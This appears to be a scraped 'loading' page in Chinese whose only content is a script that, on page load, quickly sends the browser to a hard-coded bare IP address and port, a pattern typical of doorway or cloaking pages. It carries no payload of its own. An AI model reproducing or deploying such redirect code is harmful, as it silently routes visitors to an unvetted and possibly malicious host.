<!DOCTYPE html>
                                            <html>
                                            <head>
                                              <meta charset="UTF-8">
                                                <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
                                                <meta http-equiv="Pragma" content="no-cache">
                                                <meta http-equiv="Cache-control" content="no-cache">
                                                <meta http-equiv="Cache" content="no-cache">
                                                <meta http-equiv="Expires" content="0">
                                               <meta name="viewport" content="width=device-width, initial-scale=1.0">
                                              <title>加载中....</title>
                                            </head>
                                            <body>
                                               <center style='margin-top: 5px;color: red;font-size: 16px;'>加载中....</center>
                                               <script>
                                                   function rdn(min, max) {
                                                       //return Math.floor(Math.random() * (max - min + 1)) + min;
                                                       return 8002;   
                                                   }
                                                   var linkArr=new Array();
                                                   linkArr.push('8.133.201.156'); 

                                                    var index = Math.floor((Math.random()*linkArr.length));
                                                    var hostip =linkArr[index];
                                                   var url="http://"+hostip+":"+rdn(6001, 7999)+"/dw/73719895_"+rdn(1, 1000000)+".html#index9";
                                                   setTimeout(function() {
                                                     window.location=url;
                                                   },50);
                                               </script>
                                            </body>
                                        </html>